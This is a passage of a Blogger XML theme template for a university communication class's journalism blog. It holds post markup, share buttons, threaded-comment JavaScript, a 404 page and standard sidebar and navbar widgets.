3196<div expr:id='"summary" + data:post.id'><data:post.body/></div>
3197<script type='text/javascript'>createSnippet("summary<data:post.id/>");</script>
3198</span>
3199</div>
3200 <div style='clear: both;'/>
3201 </div>
3202 <b:else/>
3203 <div class='post-body entry-content' expr:id='"post-body-" + data:post.id' itemprop='articleBody'>
3204 <meta expr:content='data:post.snippet' name='twitter:description'/>
3205 <data:post.body/>
3206 </div>
3207 </b:if>
3208 <b:else/>
3209 <div class='post-body entry-content' expr:id='"post-body-" + data:post.id' itemprop='articleBody'>
3210 <meta expr:content='data:post.snippet' name='twitter:description'/>
3211 <data:post.body/>
3212 </div>
3213 </b:if>
3214 <b:if cond='data:blog.pageType != "item"'>
3215 <b:if cond='data:blog.pageType != "static_page"'>
3216<div class='second-meta'>
3217 <a class='read-more anchor-hover' expr:href='data:post.url'><span>Read more</span></a>
3218<div style='clear: both;'/>
3219 </div>
3220
3221 </b:if></b:if>
3222 </article>
3223
3224 <b:if cond='data:post.hasJumpLink'>
3225 <div class='jump-link'>
3226 <a expr:href='data:post.url + "#more"' expr:title='data:post.title'><data:post.jumpText/></a>
3227 </div>
3228 </b:if>
3229
3230 <div class='post-footer'>
3231<b:if cond='data:blog.pageType == "item"'>
3232<div class='footer-meta'>
3233<div class='share-box'>
3234
3235 <h8 class='share-title'>Share This:</h8>
3236 <div class='share-art'>
3237<a class='fac-art' expr:href='"http://www.facebook.com/sharer.php?u=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-facebook'/><span class='resp_del'> Facebook</span></a>
3238
3239<a class='twi-art' expr:href='"http://twitter.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter'/><span class='resp_del2'> Twitter</span></a>
3240
3241<a class='goo-art' expr:href='"https://plus.google.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus'/><span class='resp_del3'> Google+</span></a>
3242
3243<a class='pin-art' expr:href='"http://pinterest.com/pin/create/button/?url=" + data:post.url + "&media=" + data:post.firstImageUrl + "&description=" + data:post.snippet' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-pinterest'/><span class='resp_del4'> Pinterest</span></a>
3244
3245<a class='lin-art' expr:href='"http://www.linkedin.com/shareArticle?url=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-linkedin-square'/><span class='resp_del5'> Linkedin</span></a>
3246
3247</div>
3248 </div>
3249 <div style='clear:both'/>
3250 <div class='sora-author-box'>
3251
3252<img alt='Author Image' class='avatar avatar-60 photo' expr:src='data:post.authorPhoto.url' height='100' width='110'/>
3253<p>
3254<b>About 2B Communation Class</b>
3255 <br/>
3256Hello We Are 2 B Class Communication Class In University Singaperbangsa Of Karawang. Sharing is Caring, We Love it. Take our Outstanding Journeys with you. and dont forget to share the experience for us. Cheers!</p>
3257</div>
3258 <div style='clear:both'/>
3259<div id='related-posts'>
3260 <b:if cond='data:post.labels'>
3261 <b:loop values='data:post.labels' var='label'>
3262 <b:if cond='data:label.isLast == "true"'>
3263 <span class='related-text'><data:label.name/></span>
3264 </b:if>
3265 </b:loop>
3266 </b:if>
3267 </div>
3268 </div>
3269 </b:if>
3270
3271 <div class='post-footer-line post-footer-line-1'>
3272 <span class='post-author vcard'>
3273 <b:if cond='data:top.showAuthor'>
3274 <data:top.authorLabel/>
3275 <b:if cond='data:post.authorProfileUrl'>
3276 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3277 <meta expr:content='data:post.authorProfileUrl' itemprop='url'/>
3278 <a class='g-profile' expr:href='data:post.authorProfileUrl' rel='author' title='author profile'>
3279 <span itemprop='name'><data:post.author/></span>
3280 </a>
3281 </span>
3282 <b:else/>
3283 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3284 <span itemprop='name'><data:post.author/></span>
3285 </span>
3286 </b:if>
3287 </b:if>
3288 </span>
3289
3290 <span class='post-timestamp'>
3291 <b:if cond='data:top.showTimestamp'>
3292 <data:top.timestampLabel/>
3293 <b:if cond='data:post.url'>
3294 <meta expr:content='data:post.canonicalUrl' itemprop='url'/>
3295 <a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'><abbr class='published' expr:title='data:post.timestampISO8601' itemprop='datePublished'><data:post.timestamp/></abbr></a>
3296 </b:if>
3297 </b:if>
3298 </span>
3299
3300 <span class='reaction-buttons'>
3301 <b:if cond='data:top.showReactions'>
3302 <table border='0' cellpadding='0' cellspacing='0' width='100%'><tr>
3303 <td class='reactions-label-cell' nowrap='nowrap' valign='top' width='1%'>
3304 <span class='reactions-label'>
3305 <data:top.reactionsLabel/></span> </td>
3306 <td><iframe allowtransparency='true' class='reactions-iframe' expr:src='data:post.reactionsUrl' frameborder='0' name='reactions' scrolling='no'/></td>
3307 </tr></table>
3308 </b:if>
3309 </span>
3310
3311 <span class='post-comment-link'>
3312 <b:include cond='data:blog.pageType not in {"item","static_page"} and data:post.allowComments' data='post' name='comment_count_picker'/>
3313 </span>
3314
3315 <!-- backlinks -->
3316 <span class='post-backlinks post-comment-link'>
3317 <b:if cond='data:blog.pageType not in {"item","static_page"} and data:post.showBacklinks'>
3318 <a class='comment-link' expr:href='data:post.url + "#links"'><data:top.backlinkLabel/></a>
3319 </b:if>
3320 </span>
3321
3322 <span class='post-icons'>
3323 <!-- email post links -->
3324 <b:if cond='data:post.emailPostUrl'>
3325 <span class='item-action'>
3326 <a expr:href='data:post.emailPostUrl' expr:title='data:top.emailPostMsg'>
3327 <img alt='' class='icon-action' height='13' src='//img1.blogblog.com/img/icon18_email.gif' width='18'/>
3328 </a>
3329 </span>
3330 </b:if>
3331
3332 <!-- quickedit pencil -->
3333 <b:include data='post' name='postQuickEdit'/>
3334 </span>
3335
3336 <!-- share buttons -->
3337 <div class='post-share-buttons goog-inline-block'>
3338 <b:include cond='data:post.sharePostUrl' data='post' name='shareButtons'/>
3339 </div>
3340
3341 </div>
3342
3343 <div class='post-footer-line post-footer-line-2'>
3344 <span class='post-labels'>
3345 <b:if cond='data:post.labels'>
3346 <data:postLabelsLabel/>
3347 <b:loop values='data:post.labels' var='label'>
3348 <a expr:href='data:label.url' rel='tag'><data:label.name/></a><b:if cond='not data:label.isLast'>,</b:if>
3349 </b:loop>
3350 </b:if>
3351 </span>
3352 </div>
3353
3354 <div class='post-footer-line post-footer-line-3'>
3355 <span class='post-location'>
3356 <b:if cond='data:top.showLocation'>
3357 <b:if cond='data:post.location'>
3358 <data:postLocationLabel/>
3359 <a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a>
3360 </b:if>
3361 </b:if>
3362 </span>
3363 </div>
3364 <b:if cond='data:post.authorAboutMe'>
3365 <div class='author-profile' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3366 <b:if cond='data:post.authorPhoto.url'>
3367 <img expr:src='data:post.authorPhoto.url' itemprop='image' width='50px'/>
3368 </b:if>
3369 <div>
3370 <a class='g-profile' expr:href='data:post.authorProfileUrl' itemprop='url' rel='author' title='author profile'>
3371 <span itemprop='name'><data:post.author/></span>
3372 </a>
3373 </div>
3374 <span itemprop='description'><data:post.authorAboutMe/></span>
3375 </div>
3376 </b:if>
3377 </div>
3378 <b:if cond='data:blog.pageType == "item"'>
3379 <div itemprop='publisher' itemscope='itemscope' itemtype='https://schema.org/Organization' style='display:none;'>
3380 <div itemprop='logo' itemscope='itemscope' itemtype='https://schema.org/ImageObject'>
3381 <meta expr:content='data:post.firstImageUrl' itemprop='url'/>
3382 </div>
3383 <meta expr:content='data:blog.title' itemprop='name'/>
3384 </div>
3385 </div>
3386 </b:if>
3387 </div>
3388</b:includable>
3389 <b:includable id='postQuickEdit' var='post'>
3390 <b:if cond='data:post.editUrl'>
3391 <span expr:class='"item-control " + data:post.adminClass'>
3392 <a expr:href='data:post.editUrl' expr:title='data:top.editPostMsg'>
3393 <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
3394 </a>
3395 </span>
3396 </b:if>
3397</b:includable>
3398 <b:includable id='shareButtons' var='post'>
3399 <b:if cond='data:top.showEmailButton'><a class='goog-inline-block share-button sb-email' expr:href='data:post.sharePostUrl + "&target=email"' expr:title='data:top.emailThisMsg' target='_blank'><span class='share-button-link-text'><data:top.emailThisMsg/></span></a></b:if><b:if cond='data:top.showBlogThisButton'><a class='goog-inline-block share-button sb-blog' expr:href='data:post.sharePostUrl + "&target=blog"' expr:onclick='"window.open(this.href, \"_blank\", \"height=270,width=475\"); return false;"' expr:title='data:top.blogThisMsg' target='_blank'><span class='share-button-link-text'><data:top.blogThisMsg/></span></a></b:if><b:if cond='data:top.showTwitterButton'><a class='goog-inline-block share-button sb-twitter' expr:href='data:post.sharePostUrl + "&target=twitter"' expr:title='data:top.shareToTwitterMsg' target='_blank'><span class='share-button-link-text'><data:top.shareToTwitterMsg/></span></a></b:if><b:if cond='data:top.showFacebookButton'><a class='goog-inline-block share-button sb-facebook' expr:href='data:post.sharePostUrl + "&target=facebook"' expr:onclick='"window.open(this.href, \"_blank\", \"height=430,width=640\"); return false;"' expr:title='data:top.shareToFacebookMsg' target='_blank'><span class='share-button-link-text'><data:top.shareToFacebookMsg/></span></a></b:if><b:if cond='data:top.showPinterestButton'><a class='goog-inline-block share-button sb-pinterest' expr:href='data:post.sharePostUrl + "&target=pinterest"' expr:title='data:top.shareToPinterestMsg' target='_blank'><span class='share-button-link-text'><data:top.shareToPinterestMsg/></span></a></b:if><b:if cond='data:top.showPlusOne'><div class='goog-inline-block google-plus-share-container'><data:post.googlePlusShareTag/></div></b:if>
3400</b:includable>
3401 <b:includable id='status-message'>
3402 <b:if cond='data:navMessage'>
3403 <div class='status-msg-wrap'>
3404 <div class='status-msg-body'>
3405 <data:navMessage/>
3406 </div>
3407 <div class='status-msg-border'>
3408 <div class='status-msg-bg'>
3409 <div class='status-msg-hidden'><data:navMessage/></div>
3410 </div>
3411 </div>
3412 </div>
3413 <div style='clear: both;'/>
3414<b:if cond='data:blog.pageType == "error_page"'>
3415 <div class='post-404'>
3416<div class='actions-404'>
3417<div class='ops-404'><span>Oops;</span> Sorry, but the page you were trying to view does not exist.
3418 </div>
3419<div class='title-404'>404</div>
3420<div class='link-404'>
3421<a href='/'><i class='fa fa-car'/>
3422<trans>Back to Home</trans></a>
3423</div></div>
3424</div>
3425<style>
3426.post-404 {
3427 padding-top: 40px;
3428 padding-bottom: 60px;
3429}
3430.actions-404 {
3431 width: 100%;
3432 float: right;
3433 text-align: center;
3434}
3435.ops-404 {
3436 width: 50%;
3437 margin: 0 auto;
3438 font-size: 26px;
3439 font-weight: 400;
3440font-family: 'Montserrat', sans-serif;
3441}
3442.ops-404 span {
3443 font-weight: 700;
3444}
3445.title-404 {
3446 font-size: 200px;
3447 font-weight: 700;
3448 line-height: 1.1;
3449 color:$primarycolor;
3450}
3451.link-404 {
3452 font-size: 18px;
3453 padding-top: 20px;
3454 padding-bottom: 50px;
3455}
3456#blog-pager, #sidebar-wrapper,.status-msg-wrap {
3457 display: none;
3458}
3459.status-msg-border {
3460 border: 0 !important;
3461 }
3462
3463 .status-msg-bg {
3464 background-color: #fff;
3465 }
3466#main-wrapper {
3467width: 100%;
3468 max-width: 100%;
3469}
3470</style>
3471 </b:if>
3472 </b:if>
3473</b:includable>
3474 <b:includable id='threaded-comment-form' var='post'>
3475 <div class='comment-form'>
3476 <a name='comment-form'/>
3477 <b:if cond='data:mobile'>
3478 <p><data:blogCommentMessage/></p>
3479 <data:blogTeamBlogMessage/>
3480 <a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>
3481 <iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' style='display: none' width='100%'/>
3482 <b:else/>
3483 <p><data:blogCommentMessage/></p>
3484 <data:blogTeamBlogMessage/>
3485 <a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>
3486 <iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/>
3487 </b:if>
3488 <data:post.cmtfpIframe/>
3489 <script type='text/javascript'>
3490 BLOG_CMT_createIframe('<data:post.appRpcRelayPath/>');
3491 </script>
3492 </div>
3493</b:includable>
3494 <b:includable id='threaded_comment_js' var='post'>
3495 <script async='async' expr:src='data:post.commentSrc' type='text/javascript'/>
3496
3497 <script type='text/javascript'>
3498 (function() {
3499 var items = <data:post.commentJso/>;
3500 var msgs = <data:post.commentMsgs/>;
3501 var config = <data:post.commentConfig/>;
3502
3503// <![CDATA[
3504 var cursor = null;
3505 if (items && items.length > 0) {
3506 cursor = parseInt(items[items.length - 1].timestamp) + 1;
3507 }
3508
3509 var bodyFromEntry = function(entry) {
3510 if (entry.gd$extendedProperty) {
3511 for (var k in entry.gd$extendedProperty) {
3512 if (entry.gd$extendedProperty[k].name == 'blogger.contentRemoved') {
3513 return '<span class="deleted-comment">' + entry.content.$t + '</span>';
3514 }
3515 }
3516 }
3517 return entry.content.$t;
3518 }
3519
3520 var parse = function(data) {
3521 cursor = null;
3522 var comments = [];
3523 if (data && data.feed && data.feed.entry) {
3524 for (var i = 0, entry; entry = data.feed.entry[i]; i++) {
3525 var comment = {};
3526 // comment ID, parsed out of the original id format
3527 var id = /blog-(\d+).post-(\d+)/.exec(entry.id.$t);
3528 comment.id = id ? id[2] : null;
3529 comment.body = bodyFromEntry(entry);
3530 comment.timestamp = Date.parse(entry.published.$t) + '';
3531 if (entry.author && entry.author.constructor === Array) {
3532 var auth = entry.author[0];
3533 if (auth) {
3534 comment.author = {
3535 name: (auth.name ? auth.name.$t : undefined),
3536 profileUrl: (auth.uri ? auth.uri.$t : undefined),
3537 avatarUrl: (auth.gd$image ? auth.gd$image.src : undefined)
3538 };
3539 }
3540 }
3541 if (entry.link) {
3542 if (entry.link[2]) {
3543 comment.link = comment.permalink = entry.link[2].href;
3544 }
3545 if (entry.link[3]) {
3546 var pid = /.*comments\/default\/(\d+)\?.*/.exec(entry.link[3].href);
3547 if (pid && pid[1]) {
3548 comment.parentId = pid[1];
3549 }
3550 }
3551 }
3552 comment.deleteclass = 'item-control blog-admin';
3553 if (entry.gd$extendedProperty) {
3554 for (var k in entry.gd$extendedProperty) {
3555 if (entry.gd$extendedProperty[k].name == 'blogger.itemClass') {
3556 comment.deleteclass += ' ' + entry.gd$extendedProperty[k].value;
3557 } else if (entry.gd$extendedProperty[k].name == 'blogger.displayTime') {
3558 comment.displayTime = entry.gd$extendedProperty[k].value;
3559 }
3560 }
3561 }
3562 comments.push(comment);
3563 }
3564 }
3565 return comments;
3566 };
3567
3568 var paginator = function(callback) {
3569 if (hasMore()) {
3570 var url = config.feed + '?alt=json&v=2&orderby=published&reverse=false&max-results=50';
3571 if (cursor) {
3572 url += '&published-min=' + new Date(cursor).toISOString();
3573 }
3574 window.bloggercomments = function(data) {
3575 var parsed = parse(data);
3576 cursor = parsed.length < 50 ? null
3577 : parseInt(parsed[parsed.length - 1].timestamp) + 1
3578 callback(parsed);
3579 window.bloggercomments = null;
3580 }
3581 url += '&callback=bloggercomments';
3582 var script = document.createElement('script');
3583 script.type = 'text/javascript';
3584 script.src = url;
3585 document.getElementsByTagName('head')[0].appendChild(script);
3586 }
3587 };
3588 var hasMore = function() {
3589 return !!cursor;
3590 };
3591 var getMeta = function(key, comment) {
3592 if ('iswriter' == key) {
3593 var matches = !!comment.author
3594 && comment.author.name == config.authorName
3595 && comment.author.profileUrl == config.authorUrl;
3596 return matches ? 'true' : '';
3597 } else if ('deletelink' == key) {
3598 return config.baseUri + '/delete-comment.g?blogID='
3599 + config.blogId + '&postID=' + comment.id;
3600 } else if ('deleteclass' == key) {
3601 return comment.deleteclass;
3602 }
3603 return '';
3604 };
3605
3606 var replybox = null;
3607 var replyUrlParts = null;
3608 var replyParent = undefined;
3609
3610 var onReply = function(commentId, domId) {
3611 if (replybox == null) {
3612 // lazily cache replybox, and adjust to suit this style:
3613 replybox = document.getElementById('comment-editor');
3614 if (replybox != null) {
3615 replybox.height = '250px';
3616 replybox.style.display = 'block';
3617 replyUrlParts = replybox.src.split('#');
3618 }
3619 }
3620 if (replybox && (commentId !== replyParent)) {
3621 replybox.src = '';
3622 document.getElementById(domId).insertBefore(replybox, null);
3623 replybox.src = replyUrlParts[0]
3624 + (commentId ? '&parentID=' + commentId : '')
3625 + '#' + replyUrlParts[1];
3626 replyParent = commentId;
3627 }
3628 };
3629
3630 var hash = (window.location.hash || '#').substring(1);
3631 var startThread, targetComment;
3632 if (/^comment-form_/.test(hash)) {
3633 startThread = hash.substring('comment-form_'.length);
3634 } else if (/^c[0-9]+$/.test(hash)) {
3635 targetComment = hash.substring(1);
3636 }
3637
3638 // Configure commenting API:
3639 var configJso = {
3640 'maxDepth': config.maxThreadDepth
3641 };
3642 var provider = {
3643 'id': config.postId,
3644 'data': items,
3645 'loadNext': paginator,
3646 'hasMore': hasMore,
3647 'getMeta': getMeta,
3648 'onReply': onReply,
3649 'rendered': true,
3650 'initComment': targetComment,
3651 'initReplyThread': startThread,
3652 'config': configJso,
3653 'messages': msgs
3654 };
3655
3656 var render = function() {
3657 if (window.goog && window.goog.comments) {
3658 var holder = document.getElementById('comment-holder');
3659 window.goog.comments.render(holder, provider);
3660 }
3661 };
3662
3663 // render now, or queue to render when library loads:
3664 if (window.goog && window.goog.comments) {
3665 render();
3666 } else {
3667 window.goog = window.goog || {};
3668 window.goog.comments = window.goog.comments || {};
3669 window.goog.comments.loadQueue = window.goog.comments.loadQueue || [];
3670 window.goog.comments.loadQueue.push(render);
3671 }
3672 })();
3673// ]]>
3674 </script>
3675</b:includable>
3676 <b:includable id='threaded_comments' var='post'>
3677 <div class='comments' id='comments'>
3678 <a name='comments'/>
3679 <h4><data:post.commentLabelFull/>:</h4>
3680
3681 <div class='comments-content'>
3682 <b:include cond='data:post.embedCommentForm' data='post' name='threaded_comment_js'/>
3683 <div id='comment-holder'>
3684 <data:post.commentHtml/>
3685 </div>
3686 </div>
3687
3688 <p class='comment-footer'>
3689 <b:if cond='data:post.allowNewComments'>
3690 <b:include data='post' name='threaded-comment-form'/>
3691 <b:else/>
3692 <data:post.noNewCommentsText/>
3693 </b:if>
3694 </p>
3695
3696 <b:if cond='data:showCmtPopup'>
3697 <div id='comment-popup'>
3698 <iframe allowtransparency='true' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'>
3699 </iframe>
3700 </div>
3701 </b:if>
3702
3703 <div id='backlinks-container'>
3704 <div expr:id='data:widget.instanceId + "_backlinks-container"'>
3705 <b:include cond='data:post.showBacklinks' data='post' name='backlinks'/>
3706 </div>
3707 </div>
3708 </div>
3709</b:includable>
3710 </b:widget>
3711 </b:section>
3712
3713</div>
3714 <div id='sidebar-wrapper'>
3715<b:section class='sidebar' id='sidebar' preferred='yes'>
3716 <b:widget id='HTML5' locked='false' title='Ayo Literasi!' type='HTML'>
3717 <b:widget-settings>
3718 <b:widget-setting name='content'><![CDATA[<iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/TdFJmtMTF-M" width="320"></iframe>]]></b:widget-setting>
3719 </b:widget-settings>
3720 <b:includable id='main'>
3721 <!-- only display title if it's non-empty -->
3722 <b:if cond='data:title != ""'>
3723 <h2 class='title'><data:title/></h2>
3724 </b:if>
3725 <div class='widget-content'>
3726 <data:content/>
3727 </div>
3728
3729 <b:include name='quickedit'/>
3730</b:includable>
3731 </b:widget>
3732 <b:widget id='ReportAbuse1' locked='false' title='' type='ReportAbuse'>
3733 <b:includable id='main'>
3734 <b:include name='reportAbuse'/>
3735</b:includable>
3736 </b:widget>
3737 <b:widget id='Label1' locked='false' title='Categories' type='Label' version='1'>
3738 <b:widget-settings>
3739 <b:widget-setting name='sorting'>ALPHA</b:widget-setting>
3740 <b:widget-setting name='display'>CLOUD</b:widget-setting>
3741 <b:widget-setting name='selectedLabelsList'/>
3742 <b:widget-setting name='showType'>ALL</b:widget-setting>
3743 <b:widget-setting name='showFreqNumbers'>false</b:widget-setting>
3744 </b:widget-settings>
3745 <b:includable id='main'>
3746 <b:if cond='data:title != ""'>
3747 <h2><data:title/></h2>
3748 </b:if>
3749 <div expr:class='"widget-content " + data:display + "-label-widget-content"'>
3750 <b:if cond='data:display == "list"'>
3751 <ul>
3752 <b:loop values='data:labels' var='label'>
3753 <li>
3754 <b:if cond='data:blog.url == data:label.url'>
3755 <span expr:dir='data:blog.languageDirection'><data:label.name/></span>
3756 <b:else/>
3757 <a expr:dir='data:blog.languageDirection' expr:href='data:label.url'><data:label.name/></a>
3758 </b:if>
3759 <b:if cond='data:showFreqNumbers'>
3760 <span dir='ltr'>(<data:label.count/>)</span>
3761 </b:if>
3762 </li>
3763 </b:loop>
3764 </ul>
3765 <b:else/>
3766 <b:loop values='data:labels' var='label'>
3767 <span expr:class='"label-size label-size-" + data:label.cssSize'>
3768 <b:if cond='data:blog.url == data:label.url'>
3769 <span expr:dir='data:blog.languageDirection'><data:label.name/></span>
3770 <b:else/>
3771 <a expr:dir='data:blog.languageDirection' expr:href='data:label.url'><data:label.name/></a>
3772 </b:if>
3773 <b:if cond='data:showFreqNumbers'>
3774 <span class='label-count' dir='ltr'>(<data:label.count/>)</span>
3775 </b:if>
3776 </span>
3777 </b:loop>
3778 </b:if>
3779 <!--b:include name='quickedit'/-->
3780 </div>
3781</b:includable>
3782 </b:widget>
3783 <b:widget id='BlogArchive1' locked='false' title='Blog Archive' type='BlogArchive'>
3784 <b:widget-settings>
3785 <b:widget-setting name='showStyle'>HIERARCHY</b:widget-setting>
3786 <b:widget-setting name='yearPattern'>yyyy</b:widget-setting>
3787 <b:widget-setting name='showWeekEnd'>true</b:widget-setting>
3788 <b:widget-setting name='monthPattern'>MMMM yyyy</b:widget-setting>
3789 <b:widget-setting name='dayPattern'>MMM dd</b:widget-setting>
3790 <b:widget-setting name='weekPattern'>MM/dd</b:widget-setting>
3791 <b:widget-setting name='chronological'>false</b:widget-setting>
3792 <b:widget-setting name='showPosts'>true</b:widget-setting>
3793 <b:widget-setting name='frequency'>MONTHLY</b:widget-setting>
3794 </b:widget-settings>
3795 <b:includable id='main'>
3796 <b:if cond='data:title != ""'>
3797 <h2><data:title/></h2>
3798 </b:if>
3799 <div class='widget-content'>
3800 <div id='ArchiveList'>
3801 <div expr:id='data:widget.instanceId + "_ArchiveList"'>
3802 <b:include cond='data:style == "HIERARCHY"' data='data' name='interval'/>
3803 <b:include cond='data:style == "FLAT"' data='data' name='flat'/>
3804 <b:include cond='data:style == "MENU"' data='data' name='menu'/>
3805 </div>
3806 </div>
3807 <b:include name='quickedit'/>
3808 </div>
3809</b:includable>
3810 <b:includable id='flat' var='data'>
3811 <ul class='flat'>
3812 <b:loop values='data:data' var='i'>
3813 <li class='archivedate'>
3814 <a expr:href='data:i.url'><data:i.name/></a> (<data:i.post-count/>)
3815 </li>
3816 </b:loop>
3817 </ul>
3818</b:includable>
3819 <b:includable id='interval' var='intervalData'>
3820 <b:loop values='data:intervalData' var='interval'>
3821 <ul class='hierarchy'>
3822 <li expr:class='"archivedate " + data:interval.expclass'>
3823 <b:include cond='data:interval.toggleId' data='interval' name='toggle'/>
3824 <a class='post-count-link' expr:href='data:interval.url'>
3825 <data:interval.name/>
3826 </a>
3827 <span class='post-count' dir='ltr'>(<data:interval.post-count/>)</span>
3828 <b:include cond='data:interval.data' data='interval.data' name='interval'/>
3829 <b:include cond='data:interval.posts' data='interval.posts' name='posts'/>
3830 </li>
3831 </ul>
3832 </b:loop>
3833</b:includable>
3834 <b:includable id='menu' var='data'>
3835 <select expr:id='data:widget.instanceId + "_ArchiveMenu"'>
3836 <option value=''><data:title/></option>
3837 <b:loop values='data:data' var='i'>
3838 <option expr:value='data:i.url'><data:i.name/> (<data:i.post-count/>)</option>
3839 </b:loop>
3840 </select>
3841</b:includable>
3842 <b:includable id='posts' var='posts'>
3843 <ul class='posts'>
3844 <b:loop values='data:posts' var='post'>
3845 <li><a expr:href='data:post.url'><data:post.title/></a></li>
3846 </b:loop>
3847 </ul>
3848</b:includable>
3849 <b:includable id='toggle' var='interval'>
3850 <a class='toggle' href='javascript:void(0)'>
3851 <span expr:class='"zippy" + (data:interval.expclass == "expanded" ? " toggle-open" : "")'>
3852 <b:if cond='data:interval.expclass == "expanded"'>
3853 ▼ 
3854 <b:elseif cond='data:blog.languageDirection == "rtl"'/>
3855 ◄ 
3856 <b:else/>
3857 ► 
3858 </b:if>
3859 </span>
3860 </a>
3861</b:includable>
3862 </b:widget>
3863 <b:widget id='HTML7' locked='false' title='footer logo' type='HTML' version='1'>
3864 <b:widget-settings>
3865 <b:widget-setting name='content'/>
3866 </b:widget-settings>
3867 <b:includable id='main'>
3868
3869
3870
3871 <div class='footer-bottom'>
3872 <data:content/>
3873 </div>
3874
3875
3876
3877
3878 </b:includable>
3879 </b:widget>
3880 <b:widget id='HTML8' locked='false' title='Social' type='HTML'>
3881 <b:widget-settings>
3882 <b:widget-setting name='content'><style>
3883.techornate-social-buttons ul{padding-left:0;list-style:none}.techornate-social-buttons li a{text-transform:uppercase;text-decoration:none;padding:10px 1px 10px 10px;letter-spacing:2px;font-size:10px;color:#fff;display:block;border-radius:3px}.techornate-social-buttons ul li{margin-bottom:10px;width:100%}.techornate-social-buttons li a i{width:35px;height:14px;float:right;padding:0 0 0 10px;margin:0;font-size:14px;line-height:14px;border-left:1px solid #B1B1B1}.techornate-social-buttons li a.social-btn-facebook{background:#3b5998}.techornate-social-buttons li a.social-btn-twitter{background:#1da1f2}.techornate-social-buttons li a.social-btn-youtube{background:#cd201f}.techornate-social-buttons li a.social-btn-instagram{background:#405de6}.techornate-social-buttons li a.social-btn-google{background:#dd4b39}
3884</style>
3885<div class="techornate-social-buttons">
3886<ul class="sidebar-social clearfix">
3887<li><a href="#" class="social-btn-facebook">Like on Facebook <i class="fa fa-facebook"></i> </a></li>
3888<li><a href="#" class="social-btn-twitter">Follow on Twitter <i class="fa fa-twitter"></i> </a></li> <li><a href="#" class="social-btn-google">Follow on Google+ <i class="fa fa-google"></i> </a></li>
3889<li><a href="#" class="social-btn-instagram">Follow on Instagram <i class="fa fa-instagram"></i> </a></li>
3890<li><a href="#" class="social-btn-youtube">Subscribe on Youtube <i class="fa fa-youtube"></i> </a></li>
3891</ul>
3892</div></b:widget-setting>
3893 </b:widget-settings>
3894 <b:includable id='main'>
3895 <!-- only display title if it's non-empty -->
3896 <b:if cond='data:title != ""'>
3897 <h2 class='title'><data:title/></h2>
3898 </b:if>
3899 <div class='widget-content'>
3900 <data:content/>
3901 </div>
3902
3903 <b:include name='quickedit'/>
3904</b:includable>
3905 </b:widget>
3906 <b:widget id='HTML6' locked='false' title='footer social' type='HTML' version='1'>
3907 <b:widget-settings>
3908 <b:widget-setting name='content'/>
3909 </b:widget-settings>
3910 <b:includable id='main'>
3911
3912
3913 <div class='footer-social'>
3914
3915
3916
3917 <data:content/>
3918 </div>
3919
3920
3921 </b:includable>
3922 </b:widget>
3923 <b:widget id='Navbar1' locked='false' title='Navbar' type='Navbar' version='1'>
3924 <b:includable id='main'><script type="text/javascript">
3925 function setAttributeOnload(object, attribute, val) {
3926 if(window.addEventListener) {
3927 window.addEventListener('load',
3928 function(){ object[attribute] = val; }, false);
3929 } else {
3930 window.attachEvent('onload', function(){ object[attribute] = val; });
3931 }
3932 }
3933 </script>
3934<div id="navbar-iframe-container"></div>
3935<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
3936<script type="text/javascript">
3937 gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() {
3938 if (gapi.iframes && gapi.iframes.getContext) {
3939 gapi.iframes.getContext().openChild({
3940 url: 'https://www.blogger.com/navbar.g?targetBlogID\x3d7911370549500235876\x26blogName\x3dJURNALISTIK\x26publishMode\x3dPUBLISH_MODE_BLOGSPOT\x26navbarType\x3dLIGHT\x26layoutType\x3dLAYOUTS\x26searchRoot\x3dhttps://bascomm17.blogspot.com/search\x26blogLocale\x3den\x26v\x3d2\x26homepageUrl\x3dhttps://bascomm17.blogspot.com/\x26vt\x3d-2728164169760602057',
3941 where: document.getElementById("navbar-iframe-container"),
3942 id: "navbar-iframe"
3943 });
3944 }
3945 });
3946 </script><script type="text/javascript">
3947(function() {
3948var script = document.createElement('script');
3949script.type = 'text/javascript';
3950script.src = '//pagead2.googlesyndication.com/pagead/js/google_top_exp.js';
3951var head = document.getElementsByTagName('head')[0];
3952if (head) {
3953head.appendChild(script);
3954}})();
3955</script>
3956</b:includable>
3957 </b:widget>
3958</b:section>
3959 </div>
3960 <div style='clear: both;'/>
3961 </div>
3962 <!-- end content-wrapper -->
3963<b:if cond='data:blog.url == data:blog.homepageUrl'>
3964<div style='clear: both;'/>
3965<div class='sub-wrap'>
3966 <b:section class='featuresub row' id='Subscription Widget' maxwidget='1' showaddelement='yes'>
3967 <b:widget id='HTML1' locked='false' title='' type='HTML' version='1'>
3968 <b:widget-settings>
